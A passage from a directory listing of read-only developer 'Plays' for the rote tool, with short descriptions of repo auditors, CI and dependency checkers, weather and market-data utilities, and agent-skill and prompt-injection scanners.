THE REAL COMMANDS, ENTRY POINTS, TRAPS) with file:line evidence. Read-only: never runs the target repo's own toolchain.ROTE11 STEPSREAD ONLY7 ↓127Agent Whisper MapYour AI agent reads invisible ink. Scans a repo for zero-width smuggling, Trojan-Source bidi, homoglyphs, hidden HTML comments, and prompt-injection phrases — then shows what you see vs what the agent reads. Read-only, zero adapters, Python stdlib.ROTE1 STEPSREAD ONLY7 ↓128Play Score FixScore your own Play before you publish it, and get the exact text that fixes what is missing. Runs the real rote scorer rather than guessing, then turns each failing signal into paste-ready frontmatter written against your play's own name and step list. The eight signals are worth fixed points and four of them are pure metadata, so most plays sitting below a full mark are about twenty minutes of frontmatter away from one. Reports the points on the table and orders the work by what is worth most. Reads your play files and writes nothing. Point it at a play, a directory of plays, or the directory you are standing in.ROTE5 STEPSREAD ONLY7 ↓129Feature ScaffoldingUniversal AI Pattern-Aware & Self-Healing Feature & API Scaffolder for Node.js, Go, Python, and RustROTE4 STEPSREAD ONLY7 ↓130Playoffs ScaffoldingUniversal AI Pattern-Aware & Self-Healing Feature & API Scaffolder for Node.js, Go, Python, and RustROTE4 STEPSREAD ONLY7 ↓131Release Notes From Tag RangeRelease notes from a tag range on a public GitHub repo: categorized changelog, evidence map, and validation counts. Unauthenticated GitHub REST only, strictly read-only.ROTE1 STEPSREAD ONLY7 ↓132Documentation Contract RefereeReferees executable claims in README files and runbooks against repository evidence: commands, prerequisites, Markdown anchors, package scripts, Make targets, Just recipes, package manager, versions, and environment templates. Returns a compact contract verdict with coverage, evidence, and fixes. Credential-free and never executes copied documentation commands.ROTE4 STEPSREAD ONLY7 ↓133Market Signal QualityGrades how much weight a prediction market price can carry from the evidence the venue publishes with it. Two Manifold listings run in parallel—one ordered by liquidity and one by closing date—and each is graded independently before the presentation deduplicates stable market identities. That preserves evidence from one listing when the other fails. The screen checks open binary status, closing time, probability, liquidity, recent volume, and distinct-bettor fields against explicit heuristic thresholds. Missing, non-finite, negative, fractional, stale, resolved, and out-of-range values cannot earn BACKED; each weak or invalid result names the reason. A listing that fails is reported as unread, and listings with no market records fail rather than becoming an empty success. This is a read-only data-quality screen, not an accuracy claim or financial advice: it recommends no position, places no order, and needs no account or credential.APIMANIFOLD-MARKETS4 STEPSREAD ONLY6 ↓134Outdoor Work WindowNames a place and answers which of the coming days are workable outdoors, judged against thresholds you set, with every rejection stated as a measurement rather than an adjective. Three adapters answer three questions none of the others can: geocoding turns the place name into coordinates, the forecast supplies rain, wind and heat at those coordinates, and a separate air quality service supplies particulates, the two readings running as parallel steps because neither depends on the other. A day counts as workable only when every dimension answered for it: a forecast day with no air quality reading is reported NOT JUDGED and is never counted workable, because a crew scheduled on a day nobody checked is exactly the failure this exists to prevent, and "nothing was wrong" must not render the same as "one source had no reading". Thresholds for rain, wind, heat and PM2.5 are parameters, since a safety policy belongs to the organisation running the work rather than to this play, and every report restates the ones it used so the verdict is checkable. None of the three adapters needs a credential, so it answers on a first run with nothing to sign up for. Read-only: three GET requests to public forecast services, nothing written and nothing stored.APIOPEN-METEOOPEN-METEO-AIR-QUALITYOPEN-METEO-GEOCODING6 STEPSREAD ONLY6 ↓135Org Public Exposure AuditAnswers one question about a whole GitHub organisation or account: which public repositories carry credentials in their git history, and which public repositories were not checked at all. Every scanner reports what it found, but a compliance answer is only usable if it also reports what it never looked at. Unscanned public repositories are therefore listed by name with the reason, and the verdict cannot be CLEAN while any remain. GitHub inventory and local-clone discovery run independently, the intersection is scanned, and a CLEAN child must also match every current public head and tag before the evidence is joined. It never clones or fetches: missing or stale clones remain explicit gaps. Network access uses the caller's authenticated gh session for inventory and credential-free public Git ref reads for freshness; the Play carries and stores no token. Read-only throughout: it reads local Git history, rotates nothing, and modifies no repository.ROTE5 STEPSREAD ONLY6 ↓136Morning Workstation PrepLaunch your whole work environment in one run. rote prompts you to pick a mode — launch (open everything saved), new (erase and set a fresh workstation), or edit (update browser/apps/files) — then opens browser tabs in one window, launches apps, and opens files. Config saved to ~/.config/morning-prep/config.json. Cross-platform: macOS, Linux, WSL2.ROTE1 STEPSREAD ONLY6 ↓137Umbrella CheckPeople in Bangalore never know when they need an umbrella. This looks at the next three hours instead of the whole day, which is the question you have at 8am on the doorstep and at 4pm before you leave. It finds you from your IP, reads the hourly rain probability there, and gives one of four verdicts. Take it, pocket a small one, probably fine, go free. Supply coordinates and it skips the location lookup entirely, so nothing is sent to a geolocation service at all. Two public GET APIs, no key and no account. The first run on the machine that built it cost 3,946 tokens. It reads and nothing else.APISESSIONSIPAPIOPEN-METEO3 STEPSREAD ONLY6 ↓138Os PortabilityReads a repository's tracked files out of the git index and reports what breaks when a teammate checks it out on a different operating system. 7 independent probes cover paths that differ only by case or by unicode normalisation, Windows reserved names and illegal characters, CRLF and mixed line endings, a UTF-8 BOM in front of a shebang or a .json file, shebang scripts missing the executable bit - git hooks git silently skips included - tracked symlinks, absolute host paths such as /Users/you or C:\ left in source, non-NFC and zero-width filenames, and whether .gitattributes covers the extensions in use or mandates CRLF repository-wide. Every finding is classed breaks-checkout, breaks-run or cosmetic for linux, macos and windows separately. It reports UNKNOWN rather than a pass when the target is not a git work tree, has no commits and nothing staged, when a probe cannot report, and when no file was examined - a pass over zero coverage is never printed. It never flags .bat files, binaries, emoji joiners or Persian spelling, never reads comments, and it does not build, run or test anything, use the network, or write to the repository. Catches bad interpreter: /bin/bash^M first.ROTE8 STEPSREAD ONLY6 ↓139New Repo SpeedrunTurn unfamiliar-repository archaeology into a short starting guide: purpose signals, directories, entrypoints, declared tests, setup clues, and environment contracts. Read-only.ROTE7 STEPSREAD ONLY6 ↓140Dependency Upgrade Impact MapperA dependency upgrade can affect application code, wrappers, configuration, tests, build images, and generated contracts in different ways. Dependency Upgrade Impact Mapper starts with a local repository and dependency name, then compiles a static blast-radius report across manifests, direct imports, indirect references, configuration, and test paths. It grades direct observable usage separately from heuristics and suggests a safe verification order without running commands. The report is not a changelog parser, compatibility guarantee, or security verdict: dynamic imports, transitive behavior, runtime feature flags, and upstream release notes remain UNKNOWN unless provided locally. Read-only: no package operation, lockfile write, test execution, service access, or repository mutation occurs.ROTE7 STEPSREAD ONLY6 ↓141Mcp Security Firewall GuardSecurity & Governance Sentinel for mcp-security-firewall-guard: Scans authorization tokens, inspects protocol payloads, checks CORS policies, and mitigates OWASP Top 10 vulnerabilities.SESSIONS6 STEPSREAD ONLY6 ↓142Pr PreflightAnswers one question before you request review: is this branch actually ready? Checks rebase state against base, flags commits with uninformative messages, reports whether source changes arrived without test changes, and catches uncommitted work that would silently miss the PR. Read-only, no credentials, no writes, needs only git.ROTE6 STEPSREAD ONLY6 ↓143Spreadsheet Formula AuditFinds the formula mistakes that quietly make a spreadsheet wrong: a total whose range stops before the data does, a formula that breaks the pattern its neighbours follow, a number typed inside a formula instead of living in its own cell, and cells already showing an error. Reads .xlsx with no library and no login -- point it at a file. Writes one PDF report; never modifies the workbook. Run it with no arguments to audit the bundled sample workbook first.ROTE4 STEPSREAD ONLY6 ↓144Stranger TestClones the target repository from its own git objects into a temp directory, so untracked files, a gitignored .env and unpushed commits vanish exactly as they do for everyone else, then reports what a stranger hits first. 7 probes across 3 dependency layers cover the gitignored-but-present census, the host toolchain, environment variables the code reads but never documents, README commands that resolve to no npm script or no file at the path they name, whether the documented npm ci or poetry install can even run against the committed lockfile, and the submodules and git-lfs pointers a plain clone leaves empty or stubbed while exiting 0. The verdict orders findings by when a stranger meets them, clone then configure then install then run, and counts the undocumented actions between clone and a working state. It reports UNKNOWN, never a pass, when the target is not a git work tree, has no commits, or a probe cannot report. It does not check whether the code is correct, whether tests pass, or whether required services are running. Read-only: no network, no credentials, no writes to the target.ROTE7 STEPSREAD ONLY6 ↓145Flaky SignalsAnswers one question about a repo: which tests have a STRUCTURAL reason to be flaky. A flaky test costs more than a missing one, because it trains the team to re-run CI instead of reading it, so this reads the test source for CAUSES rather than CI history for symptoms, which means it works offline, needs no credentials, and works on a repo with no CI and on a test that has never run once. Seven causes, ranked by how reliably each one actually flakes rather than by how easy it was to match: a bare sleep standing in for a wait condition and an assertion on Go map or Rust HashMap iteration order are near-certain; unseeded randomness, a wall-clock assertion, shared module-level state, an unreverted environment write and a sub-100ms timing tolerance are likely; a hardcoded port is only as dangerous as the CI concurrency it runs under, and is graded that way. Precision is the product, so five decoys are recognised by name and excluded rather than reported, with every exclusion counted and explained: a SEEDED generator is deterministic and is never reported; a loopback URL pointing at a fixture server the test starts itself is not a network dependency; a frozen or injected clock (freezegun, fake timers, clockwork, a Clock parameter) is not a wall-clock read; a sleep inside a bounded retry that can exit early is a backoff, not a synchronisation; and port 0 or a port read back from an ephemeral allocation cannot collide. Comment bodies and string contents are masked before any construct rule runs, and a clock read that only feeds a log line or measures an interval is not an assertion. Python dict, JS object, JS Map and JS Set iteration are insertion-ordered, so they are deliberately NOT reported; Go map and Rust HashMap order are randomised by design, so they are. Covers JavaScript, TypeScript, Python, Go, Rust, C++ and Java-ish sources. This is NOT the skipped-tests play: that one inventories tests that do not run, this one finds tests that DO run and run unreliably. Read-only, offline, no network, no credentials.ROTE2 STEPSREAD ONLY6 ↓146Ai Code Change Risk GateClassifies the engineering risk of a code change by analyzing git diffs for high-risk patterns in auth, payments, security, and infrastructure.ROTE16 STEPSREAD ONLY6 ↓147Pr Review VerdictAnswers the question you actually have after a review lands: what did the reviewers decide, and where is the substance. Reading a pull request's review state wrong is the common failure, and it fails in the direction that looks like good news. GitHub keeps every review a person ever submitted, so the reviewer who requested changes in March and approved in April appears as both; only the newest verdict per reviewer is that person's position. A COMMENTED review is a remark, not a decision, and DISMISSED is a decision that was taken back. The pull-request-level review decision GitHub exposes stays empty unless a branch protection rule requires reviews, so an unprotected repository reports nothing on a pull request a reviewer is blocking. And zero inline comments means two opposite things: on an approval the body is the whole review, but on a blocking review it means the objection does not attach to any changed line, which is the shape most worth reading in full and exactly the one a count of inline comments reads as nothing to fix. This play applies those rules to one pull request and reports a single verdict, one next action, and per reviewer where the substance is. Read-only: four GitHub reads through your existing gh sign-in, no writes, and it degrades to the anonymous public API when gh is absent.ROTE5 STEPSREAD ONLY6 ↓148Auth Security AuditAudits jsonwebtoken and bcryptjs usage across Express auth routes under a source directory: verifies password hashing (bcrypt salt rounds, compare usage, no plaintext storage) and JWT lifecycle (signing expiry, middleware verification, bearer extraction, 401 handling), then emits a security verification checklist plus prioritized recommendations. Process-only, read-only, needs python3.ROTE2 STEPSREAD ONLY6 ↓149Git Handoff SnapshotCreates a compact Git handoff with branch, upstream ahead/behind, HEAD, changed paths, numstat diff statistics, stash count, and recent commit metadata without reading file contents or patch hunks.ROTE7 STEPSREAD ONLY6 ↓150Clone Repo Into FolderEnsure a base directory exists and clone a git repo into it, skipping the clone if already presentROTE6 STEPSREAD ONLY6 ↓151Weather Station ConformanceCurrent temperature for several weather stations plus a reference station temperature and wind speed, a note when the reference is at or above a chosen threshold, a headline lifted from a live dashboard page, and a record of the host python that produced the reading.APIBROWSERSHELLOPEN-METEO8 STEPSREAD ONLY6 ↓152Weather Station UpdatesReports current temperatures for a single editable station list, includes wind for the reference station, emits a threshold alert, verifies a live page headline, and captures Python toolchain provenance.APISESSIONSOPEN-METEO4 STEPSREAD ONLY6 ↓153Job Match ScoutMojito: Find jobs. Skip the wrong ones. Teach it your taste. Evaluates live remote jobs against candidate profile and learns from user corrections.ROTE2 STEPSREAD ONLY5 ↓154Api First CallTurn API documentation or a snippet plus a desired action into a smallest-first request draft with endpoint, method, headers, body, examples, response expectations, and common mistakes. Never exposes supplied secrets or calls the API.ROTE12 STEPSREAD ONLY5 ↓155Demo Data FactoryCreate a synthetic demo-data blueprint with normal, edge, empty, date, long-text, and error cases from an app schema. Never reads production data or writes files.ROTE9 STEPSREAD ONLY5 ↓156Mock Api From ExampleTurn example JSON or a short response description into a static mock API contract covering success, empty, loading-equivalent, and error responses. It does not start a server or write files.ROTE8 STEPSREAD ONLY5 ↓157Judge Question GeneratorGenerate realistic hackathon judging questions across users, problem, technical choices, differentiation, feasibility, limitations, scale, security, and substantiated value claims.ROTE8 STEPSREAD ONLY5 ↓158Json To TypesGenerate a clean inferred TypeScript interface from sample JSON and identify nullable or questionable fields. Inference is explicitly sample-based; no API calls or files are written.ROTE8 STEPSREAD ONLY5 ↓159Integration Contract MakerDraft a compact frontend-backend contract with endpoint, request, response, status/error cases, ownership, assumptions, and unresolved decisions before teammates code separately.ROTE8 STEPSREAD ONLY5 ↓160Rl Signal DetectionDetect PPO/GRPO policy collapse, exploration death, and reward crashes with deterministic threshold citations.ROTE1 STEPSREAD ONLY5 ↓161Error To Search QueryExtract the useful signal from a noisy error or stack trace, identify likely technology context, and produce precise search queries plus evidence to collect next. Read-only and secret-redacting.ROTE10 STEPSREAD ONLY5 ↓162Skill AuditMost of the agent skills on your machine have never run once. On the machine this was built on, 94 of 103 installed skills had never been invoked across 51 transcripts and 138 MB of session history, and their descriptions still cost about 5,280 estimated tokens of context before a single word is typed. Three DAG steps: two independent readers (installed skill roots, and Skill tool calls in local transcripts) and one join that classifies used, never- invoked, and ghost skills that were invoked but are no longer installed. Every headline number cites the field it came from, and a missing transcript directory prints INDETERMINATE instead of a confident zero. Read-only: it never edits or removes a skill, makes no network call, carries no credentials, and needs only python3.ROTE3 STEPSREAD ONLY5 ↓163Test GapFinds every git repository on this machine and ranks them by how much code ships with no tests at all. On the machine this was built on, two of three repositories contained no test file of any kind, and source outweighed tests fourteen lines to one across 15,531 lines. Three DAG steps: one reader that discovers repositories and their last commit, one that classifies every source file as production or test, and one join that ranks repos by exposure and names the directories with no sibling tests. Classification is deliberately generous, so a gap is understated rather than invented, and finding no repositories prints INDETERMINATE instead of a confident zero. It measures whether tests exist, never whether they pass. Read-only toward your code: it runs no test, changes no file you already have, makes no network call, carries no credentials, and needs only python3 and git. The one thing it writes is its own test-gap.json report, inside the run workspace.ROTE3 STEPSREAD ONLY5 ↓164Env Vibe CheckDevOps & Container Optimization Engine for env-vibe-check: Scans build artifacts, optimizes Dockerfile multi-stage layers, and automates CI/CD deployments.SESSIONS6 STEPSREAD ONLY5 ↓165100 Million Request ScalingHigh-Throughput Infrastructure & Scaling Engine for 100-million-request-scaling: Simulates extreme concurrent load, evaluates Redis token buckets, and benchmarks Kafka event streams.SESSIONS6 STEPSREAD ONLY5 ↓166Release NotesShip notes without the guilt. From a git range (two tags/SHAs), compose a categorized changelog draft: commits classified feat/fix/perf/chore/breaking, enriched with authors, rendered as markdown ready to paste — and optionally opened as a draft GitHub release, gated behind apply=true. Demonstrates the authority-boundary pattern: dry-run by default, mutation only on explicit opt-in. ROTE4 STEPSREAD ONLY5 ↓167Hooks Vs CiFinds where the checks on your machine and the checks in CI have drifted apart, which is why a green local commit fails in CI and why a green CI run misses what a hook would have caught. Compares active git hooks, husky, lefthook and .pre-commit-config.yaml against what the workflows actually invoke, normalising on the resolved tool so npm run lint, npm-run-all lint and eslint . count as one check rather than three. Reports checks CI runs that no local hook runs, checks a local hook runs that CI never enforces, tool and runtime version differences between the two, and configured hooks whose tool is not installed here. Ignores .sample hooks because git never executes them, and separates per-commit gates from workflows that only fire on a schedule or a button. Read-only, no network, no CI credentials.ROTE5 STEPSREAD ONLY5 ↓168Ci Digest GuardFinds a GitHub Actions pipeline that builds a Docker image and then deploys it with Terraform using a mutable tag instead of the immutable digest the build step already produced, and fixes it. A push landing between build and deploy -- or a scheduled re-run -- can otherwise deploy a different image than the one that was actually built and tested; a Docker maintainer has confirmed there are no plans to make buildx share images across GitHub Actions jobs another way, which is why pipelines lean on this pattern in the first place. Covers two build shapes: docker/build-push-action (any version tag or commit-SHA pin), and a raw `docker build`/`docker buildx build` shell command -- for the raw shape, a plain build prints several different sha256 digests (manifest, config, attestation, manifest list) and grabbing the first one seen would silently pick the wrong one, so the fix adds --metadata-file and reads its containerimage.digest field instead, the same field name the Action uses internally, cross-checked against `docker inspect --format {{.RepoDigests}}` on a real build. Also catches the case where --metadata-file is already present but its digest is never actually read anywhere. Matches ANY -var or TF_VAR_ name, not just literally 'image' or 'IMAGE' -- confirmed necessary against a real repo (cal-itp/benefits names its variable TF_VAR_CONTAINER_TAG) -- and follows a real terraform command across backslash line-continuations onto later lines, where the actual -var flags often live (confirmed against everclearorg/mark). When a build+deploy pair exists but no variable's value can be matched to the built image at all, reports UNKNOWN rather than a false CLEAR: this fires only on a real, visible signal -- a differently-named tag/image/version/sha/digest/ref variable whose value doesn't match, or a .tfvars/-var-file reference -- confirmed against two more real production repos where the image reference is either assembled inside Terraform HCL from a bare `${{ github.sha }}` (cal-itp) or written into a generated tfvars file from a GitHub Secret this play correctly cannot and should not see through (skkuding/codedang). Validated against 25+ real public repos via GitHub code search, not just synthetic fixtures; that search surfaced and fixed a job-parser bug where a comment line right after `jobs:` silently produced zero detected jobs across the entire file, with no error (confirmed live on skkuding/codedang). Detects the pattern whether build and deploy share one job or are linked by needs:, whether the build step has one tag or several, and whether multiple build+deploy pairs exist in one file (a monorepo -- every pair gets fixed, not just the first). Every fix is minimal: it adds an id: to the build step, an output exposing the digest, and rewires only the one line that named the mutable tag -- nothing else in the file is touched, so the diff a reviewer sees is exactly the change and nothing more. Out of scope, stated plainly rather than silently guessed at: resolving arbitrary shell `$VAR`/`${VAR}` or `${{ env.X }}` references to their literal values, and reading actual Terraform .tf/HCL files to see how a bare tag variable gets assembled into a full image reference -- both report UNKNOWN when a relevant signal is present, never a false CLEAR. No third-party dependencies: pure python3 standard library, so there is nothing to pip install on a machine that may not allow it. Read-only unless open_pr=true, which writes the fix to disk on a new branch and opens a PR through your already-authenticated gh CLI -- no new credential. Pass demo=true to run against bundled fixture workflows with zero setup. Not a daily-habit tool by itself -- an already-fixed repo reports CLEAR every time. Run it once per repo to fix what's there, or copy the GitHub Actions template in this repo's templates/ so it gates every PR touching a workflow file (no Rote needed at CI time); verified end to end with a real git diff across a two-branch repo.ROTE3 STEPSREAD ONLY5 ↓169Unpushed WorkFinds work that exists only on this machine. Scans every git repo under a directory and ranks them by how much would be lost if the disk died tonight: repos with no remote at all, branches never pushed, commits ahead of upstream, uncommitted changes, and forgotten stashes. Read-only, no credentials, no writes, needs only git and python3.ROTE2 STEPSREAD ONLY5 ↓170Repo BloatFinds what makes a git repository permanently expensive to clone. A clone downloads history, not the working tree, so deleting a large file changes nothing about what every future clone pays: the blob stays reachable from an old commit forever. This walks the whole object store with cat-file --batch-check, ranks the biggest blobs by their real on-the-wire size, names the commit and path that introduced each one, and sorts every one of them into current, superseded, or deleted-yet-still-downloaded. Separates bytes reachable from a branch (every clone pays) from bytes only the reflog or a dangling object still holds (local disk only, reclaimed by git gc). Compares pack size against what a checkout actually writes, and lists files still tracked that should have been ignored, including the ones .gitignore already excludes while the index keeps carrying them. Reports the fix honestly: history can only be removed by a rewrite that changes every commit hash. Read-only, contacts no remote, needs only git and python3.ROTE2 STEPSREAD ONLY5 ↓171Migration GuardReviews SQL migrations for the operations that take a production database down: index builds that lock writes, column type changes that rewrite the table, constraints added without NOT VALID, and destructive statements with no WHERE clause. Statement-level analysis, so comments and string literals never trigger findings, tables created in the same migration are treated as empty, and the SQLite table-rebuild pattern is recognised instead of flagged. Read-only, never connects to a database, no credentials.ROTE2 STEPSREAD ONLY5 ↓172Retry LedgerReads rote's own recorded evidence and reports what your agent failed at, what actually fixed it, and what the detour cost in time and tokens. Repeated failures of the same program are grouped into one incident, because five attempts at the same broken command are one problem and listing them separately makes a small failure look like a large one. UNCHANGED_RETRY means the identical command was run again and failed again, REPAIRED_RETRY names the exact argument that changed before it succeeded and says whether that value already appears in your AGENTS.md, CLAUDE.md or .cursorrules, TRANSIENT means the same argv succeeded later which is not proof the work was identical, UNRECOVERED means it never succeeded, INDETERMINATE means the attempts cannot be paired. It never claims a root cause: attributing the first wrong turn is a judgement the recorded evidence does not carry. Attempts are paired on program and argv rather than request method, because every process step shares one method, and rote's per-run temporary directories are collapsed first so an unchanged command is not reported as a repair. Each incident carries a regression prefix built only from what was recorded: the last step that succeeded before it, the argv that failed, and the argv that later succeeded where one did. The earliest failure in a workspace is marked as such, as an ordering fact rather than a cause. Pass workspaces_root=demo to run the bundled trajectories with no setup. Reads files only: it never executes anything and never modifies a workspace. Zero credentials, python3 only.ROTE2 STEPSREAD ONLY5 ↓173Pulled Play InventoryLists every Play package installed on this machine with its version, the date it was pulled, its step count and its size on disk. Read-only, python3 standard library only, no network and no credentials.ROTE3 STEPSREAD ONLY5 ↓174PlaychainPlans the smallest useful chain of Community Plays for a goal, showing capability coverage, handoff confidence, readiness, effects, and reasoning gaps without executing any Play.ROTE1 STEPSREAD ONLY5 ↓175Config Drift AuditorFinds configuration drift the moment a fresh clone starts failing: which env vars your code reads that .env.example never documents, which documented ones nobody uses, and -- uniquely -- whether Dockerfile ENV and CI workflow env blocks agree with what .env.example promises. Also catches type drift, the same var parsed as a number in one place and a string in another. Point it at any repo: it reads .env.example, Dockerfile*, and CI workflow/yml, cross-checks them against actual usage in Python, TypeScript/JS, and shell, and reports graded findings (likely vs possible) with the fix for each. Offline, pure Python stdlib, no credentials, no yaml dependency. Never prints env values -- only names -- so it is safe on repos holding real secrets. Zero findings on a clean repo makes it a 2-second pre-commit / CI gate for config hygiene. Try: rote play run https://play.modiqo.ai/sonic-tools/config-drift-auditor target=/abs/path/to/repoROTE1 STEPSREAD ONLY5 ↓176Commit Attribution GuardScans your recent commit messages for AI-attribution marks you may not have meant to publish -- Co-Authored-By trailers naming an AI tool, "Generated with/by" footers, robot-emoji-plus-tool-name body marks -- before that history goes public. Identity hygiene for commit metadata, NOT a repo audit: commit-history scanning (scan_log) reads commit messages only, never code. The one narrow, explicitly-scoped exception is scan_config's attribution-SOURCE check, which does read commit.template/hook file bytes to test them for a structural match -- but returns only a "class:tool" pattern identifier, never the source text itself, so no hook or template code line ever leaves this play. Five jobs across two layers: validate_repo resolves the repo path (expanding ~, going absolute) and int-guards depth, treating a real but empty repository as a clean pass rather than a failure; scan_log reads git log for the requested depth and classifies every match into exactly one of two structural shapes -- TRAILER, a Co-Authored-By or Signed-off-by trailer (recognized via git's own `interpret-trailers --parse`, so folded/continuation lines and paragraph-eligibility follow git's real rules) whose value names an AI tool, or BODY-MARK, a "Generated with/by <tool>" phrase (tool as direct object, in the commit BODY only) or a robot emoji sharing a line with a tool name -- and never flags a commit that merely discusses AI in prose (a subject like "fix claude integration bug", a quoted mention like `explains why "Generated with Claude" is forbidden`, or a body describing the removal of an old trailer, matches neither shape); scan_config checks attribution SOURCES that could re-inject a mark into a future commit -- a configured commit.template file and prepare-commit-msg/commit-msg hooks -- requiring the same structural match shapes (never a bare tool-name mention), degrading per-source rather than failing, and staying inside the repository: a configured path that resolves (symlinks included) outside the repo's real working directory is reported as out of scope and never opened (user-level ~/.claude settings are also out of scope); the presentation renders a clean bill when nothing is found and otherwise a findings table naming only the sha, the class, and the single matched line for scan_log findings, or the class:tool pattern identifier (never source text) for scan_config findings -- never the full commit message and never any code. Read-only, no credentials, no network; needs python3 and git.ROTE3 STEPSREAD ONLY5 ↓177Hey RoteUniversal Daily Work Briefing & Terminal Dashboard (v0.0.6): Features zero-markdown terminal tree rendering, ANSI box header banners, workload load meters, jump-action shortcuts, standup clipboard exports, 5-line compact MOTD/tmux mode, token efficiency metrics, and shell alias installation.ROTE1 STEPSREAD ONLY5 ↓178Dependency Vulnerability AuditScans a repo for outdated/vulnerable npm and pip dependencies, cross-references latest versions (npm registry / PyPI) and known CVEs (OSV.dev), and outputs a prioritized upgrade list — fix now for actual vulnerabilities, plan migration for major-version-behind-but-safe packages.ROTE1 STEPSREAD ONLY5 ↓179Context Compaction OptimizerAnalyze context load, predict compaction, assess information loss risk, recommend offloadsROTE1 STEPSREAD ONLY5 ↓180Skill Rot DetectorAgent Configuration Health System: Discover skills and rules across harnesses (Claude, Antigravity, Cursor, Codex, Windsurf), compute Skill Health Scores (0-100), detect duplicate/stale/conflicting rot, perform safe-removal analysis, and visualize context budgets.ROTE1 STEPSREAD ONLY5 ↓181Meeting FairnessStop the same person always taking the 6am call. Evaluates if your recurring meeting time is quietly unfair across timezones, accounting for DST shifts, rotation alternatives, and optional Google Calendar sync.ROTE1 STEPSREAD ONLY5 ↓182Find Dirty Git ReposFind git repositories under a base folder that have uncommitted changesROTE2 STEPSREAD ONLY5 ↓183Claim TrialTests one technical claim at an exact local Git revision. Runs a baseline and hostile probe in separate disposable worktrees, returns SUPPORTED, DISPROVEN, or INCONCLUSIVE with bounded evidence, and verifies the source checkout stayed unchanged. Run with no arguments for the bundled cancellation-lock demonstration.ROTE7 STEPSREAD ONLY5 ↓184Standup From GitWhat did you actually do yesterday. Walks every git repository on your machine, not one, and reads back your own commits in a window you choose, plus the repositories carrying uncommitted work you have forgotten about. Standup is daily and the answer lives scattered across six checkouts, which is why the honest answer is usually a guess. Reads nothing but git. Writes nothing anywhere, makes no network call, and needs no credential of any kind - every git command it runs is a read, and the play has no code path that modifies a repository. A repository it cannot read is named as unreadable rather than dropped, because a checkout that quietly vanishes from a standup is worse than one reported as broken, and the verify step checks that every repository discovered is accounted for in the summary rather than assuming it. A quiet day returns the outcome empty, which is a real answer and not a failure. Runs on python3 and git alone.ROTE5 STEPSREAD ONLY5 ↓185Model Price ScoutCheapest capable model, right now. Fetches live pricing from LiteLLM's public model catalog, classifies by capability tier (flagship / mid / fast / embedding), filters by provider and budget, ranks cheapest-per-M-input- token, and prints a decision table. Read-only, no credentials, no auth. Complements (does not replace) modiqo/hello, which surfaces pricing as one of nine subsystems. ROTE4 STEPSREAD ONLY5 ↓186Repo Leak DoctorZero-credential local git history and secret auditor for pre-push verification.ROTE3 STEPSREAD ONLY5 ↓187Docker ScrubUniversal Docker disk bloat auditor and safe space reclaimer Play.ROTE1 STEPSREAD ONLY5 ↓188Env SyncDeterministic .env drift auditor & auto-template sync play for polyglot codebases.ROTE1 STEPSREAD ONLY5 ↓189Dev DoctorSub-second parallel system and dev environment auditorROTE5 STEPSREAD ONLY5 ↓190My Linear IssuesList Linear issues assigned to the current user (assignee=me)SESSIONS0 STEPSREAD ONLY5 ↓191Play Quality DoctorRuns rote's own quality scorer across every Play you have, ranks the signals by what they are actually costing you, and tells you what to type to clear each one. rote play score reports a single Play's signals with their weights and status, and it is authoritative; what it does not do is run over a whole shelf, total the damage, or say which edit fixes a finding whose required shape is not obvious from the wording. Of the ten Plays installed when this was written, six scored below 1.00 and every one of them was reported as a clean pass by rote play validate: zero errors, zero warnings, Pass, and no mention that anything was unsatisfied. That gap between validate and score is the reason this exists. Two findings are worth stating because their wording does not lead you to the fix. When frontmatter_completeness reports missing optional: tags, discoverability, the required shape is a top-level tags list; tags under metadata.discoverability.tags do not count toward the signal, and that is exactly the shape rote workspace export generates, so a Play can carry nine tags and still be marked down. And provenance_url reads a top-level source field rather than provenance.url, which is the field its name points at. This reports every unsatisfied signal for one Play or all of them, with rote's own detail string, the points lost, and the edit that clears it. It computes nothing itself: run rote play score on any single Play and the numbers will match, because they are the same numbers. Read-only by construction. It reads frontmatter through rote, modifies no Play, and needs no credentials and no network. An earlier version reconstructed the rubric from the outside because I had not found rote play score; that model got the structure wrong, and Chi blu in the Rote Playoffs Discord pointed out the command. It is gone, and this wraps the real scorer instead.ROTE3 STEPSREAD ONLY4 ↓192Play Smoke TestA smoke test for a Play: does it actually run? Static scoring cannot answer that. By default this inspects only and withholds execution, because a self-declared effect-read-only tag is not proof of safety. Set allow_effects=true to authorize one bounded run with a credential-free HOME and environment. Inspection fingerprints every regular file in the complete bounded play package—including dependency/runtime manifests, helpers, resources and fixtures, regardless of directory name—with relative paths, modes and contents, while rejecting every symlink and partial over-limit bundle. Before execution it verifies the same digest, copies that exact package into an isolated snapshot, verifies the snapshot again, and runs the snapshot, so later source mutation cannot change what executes. The run captures at most 64 KiB per stream, never returns child output, and terminates the whole process group. It reports exit status, duration, and step counts, not whether the target answer is correct. The authorized target may still perform any effect its code can reach, including network or absolute-path writes, so review it before opting in.ROTE2 STEPSREAD ONLY4 ↓193Build Environment TrapsFinds the reasons a build fails that have nothing to do with the code, and that no error message ever names. A project inside iCloud, Dropbox, OneDrive or Google Drive does not report that it is being synced: the sync client fights the build over the same thousands of files in node_modules and the build sits at 0% CPU forever. A file evicted to the cloud does not report that it is a placeholder: it reads as missing or empty. A path with a space in it does not ask to be quoted: a script truncates it and blames a filename nobody asked for. Two tracked files differing only in case do not warn you: the default macOS filesystem silently keeps one, so the working tree stops matching the repository. Four probes run as parallel DAG steps, any one degrades to a labeled indeterminate rather than failing the play, and severity follows evidence, so a synced folder is a risk while a synced folder that already contains a dependency directory is a blocker, because that is the case that actually hangs. Read-only: never writes, never downloads, and never touches a cloud placeholder in a way that would pull it down. Needs python3, and git only for the case check, which is reported as unread rather than clean when git is unavailable.ROTE6 STEPSREAD ONLY4 ↓194Hackathon Official Source AuditAudits an official hackathon website for dates, prizes, eligibility, judging, sponsor technology, submission and social requirements, blockers, and a T-minus plan.ROTE5 STEPSREAD ONLY4 ↓195First Visit CostTells you what a stranger downloads, and how long they wait before your page is usable, measured from the built files rather than guessed. On its first real run it found a 1.3 MB PNG sitting beside a 42 KB WebP of the exact same 1448 by 1086 pixels, which is the kind of finding it exists for: the smaller file is already in the build, so the saving is measured rather than estimated. Four probes run as parallel DAG steps over your build output. A byte census gzips every text file for real instead of assuming a compression ratio, because that ratio varies by an order of magnitude between minified JavaScript and an already-compressed font. Image headers are decoded to intrinsic pixel size and compared against the display size the HTML declares. The render-blocking chain is walked to its depth in serialized round trips, since on a high-latency link the number of trips costs more than the bytes. Every third-party origin that has to answer before your page can paint is listed. One join turns all four into a first-paint estimate on a stated connection and a fix queue ordered by bytes actually recoverable. It is careful about what it is not. Nothing is executed, so whatever the page 